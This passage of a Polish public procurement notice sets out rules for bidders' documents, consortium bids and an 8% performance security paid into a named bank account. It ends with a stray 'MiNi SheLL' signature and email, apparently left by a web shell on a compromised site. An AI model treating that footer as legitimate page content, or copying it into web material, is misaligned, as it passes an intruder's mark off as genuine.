4.W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.
5.Dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. 
6.W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz 
w przypadku podmiotów, na zasobach których na zasadach określonych w art. 26 ust. 2b ustawy polega wykonawca, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.
7.Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
8.Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
9.Wykonawca składa oświadczenia i dokumenty przetargowe pod odpowiedzialnością karną wynikającą z art. 297 Kodeksu Karnego. W razie stwierdzenia, że złożone przez Wykonawcę informacje są nieprawdziwe Zamawiający zgodnie  z dyspozycją art. 304 k.p.k. - zawiadomi o tym fakcie właściwy organ ścigania.
10.Dokumenty wchodzące w skład oferty, w tym również te przedstawione w formie oryginałów, nie podlegają zwrotowi przez Zamawiającego. 
II. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia.
1.Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni 
spełniać warunki udziału w postępowaniu określone w punkcie 8 SIWZ oraz złożyć dokumenty i oświadczenia potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w pkt 9 SIWZ.
2. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez 
dwóch lub więcej Wykonawców, w ofercie muszą być złożone dokumenty i  		      oświadczenia wymienione w pkt 9.2. (ppkt 9.2.1.; 9.2.2. SIWZ) przez każdego z  nich. 
Dokumenty i oświadczenia  wymienione w pkt. 9.1. SIWZ (ppkt 9.1.2.do 9.1.6. SIWZ oraz 9.3.1.; 9.3.2.) wspólnie, przy czym w przypadku polisy pkt. 9.1.6.SIWZ Zamawiający dopuszcza także przedstawienie jednej polisy wystawionej na 	      Wykonawców wspólnie ubiegających się  o udzielenie zamówienia. Oświadczenie 
wymienione w pkt. 9.1.1. SIWZ - winno być podpisane przez uprawnionego
przedstawiciela Wykonawców lub wspólnie (na jednym druku) przez wszystkich
Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
Formularz ofertowy wymieniony w pkt. 9.3.1. SIWZ winien być podpisany przez
uprawnionych przedstawicieli Wykonawców.
3. Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich
w niniejszym postępowaniu albo reprezentowania ich w postępowania i zawarcia 
umowy w sprawie   zamówienia publicznego. 
4. Wszelka korespondencja prowadzona będzie wyłącznie z  Pełnomocnikiem.
III.Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy w wysokości 8 % ceny brutto podanej w ofercie z zaokrągleniem do pełnego złotego w górę.Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lub nienależytego wykonania umowy. 12.4.	Zabezpieczenie wnoszone w formie pieniężnej powinno zostać wpłacone nie później niż w dniu podpisania umowy na rachunek bankowy Zamawiającego:
Getin Noble Bank S.A. - konto nr 74 1560 1010 0000 9480 0001 1847 
Skuteczne wniesienie zabezpieczenia należytego wykonania umowy w formie pieniężnej następuje z chwilą wpływu środków pieniężnych na ww. rachunek Zamawiającego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com